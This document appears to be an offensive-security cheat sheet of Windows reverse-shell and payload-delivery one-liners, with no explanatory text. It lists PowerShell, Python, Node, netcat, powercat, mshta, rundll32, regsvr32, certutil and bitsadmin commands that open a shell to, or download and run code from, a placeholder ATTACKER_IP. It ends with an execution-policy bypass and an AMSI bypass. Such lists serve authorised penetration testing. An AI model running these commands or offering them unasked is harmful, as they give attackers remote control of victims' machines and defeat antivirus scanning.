powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& {[System.Net.Sockets.TcpClient]::new('ATTACKER_IP',PORT).GetStream().CopyTo([System.Console]::OpenStandardOutput())}"

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:PORT/shell.ps1')"

powershell -e <BASE64_ENCODED_COMMAND>

nc.exe -e cmd ATTACKER_IP PORT

powershell -c "& {[System.Net.Sockets.TcpClient]::new('ATTACKER_IP',PORT).GetStream().CopyTo([System.Console]::OpenStandardOutput())}"

telnet ATTACKER_IP PORT | cmd

powercat -c ATTACKER_IP -p PORT -e cmd

powercat -c ATTACKER_IP -p PORT -e cmd -ssl

powercat -c ATTACKER_IP -p PORT -e cmd -u

python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['cmd','/c','cmd']);"

python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['cmd','/c','cmd']);"

node -e "var net=require('net'),sh=require('child_process').exec('cmd');var client=new net.Socket();client.connect(PORT,'ATTACKER_IP',function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"

node -e "require('child_process').spawn('cmd',[],{stdio:[0,1,2]})"

var objShell = new ActiveXObject("WScript.Shell");
objShell.Run("cmd /c nc -e cmd ATTACKER_IP PORT", 0, true);

<html>
<head>
<script language="VBScript">
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd /c nc -e cmd ATTACKER_IP PORT", 0, True
</script>
</head>
</html>

mshta javascript:alert("test");

mshta vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run ""powershell -c """"& {[System.Net.Sockets.TcpClient]::new('ATTACKER_IP',PORT).GetStream().CopyTo([System.Console]::OpenStandardOutput())}"""" "",0,True"))

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("cmd /c nc -e cmd ATTACKER_IP PORT",0,true);

regsvr32 /s /n /u /i:http://ATTACKER_IP:PORT/file.sct scrobj.dll

certutil -urlcache -split -f http://ATTACKER_IP:PORT/shell.exe shell.exe && shell.exe

bitsadmin /transfer myDownloadJob /download /priority normal http://ATTACKER_IP:PORT/shell.exe C:\temp\shell.exe && C:\temp\shell.exe

powershell -ExecutionPolicy Bypass -Command "command_here"

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)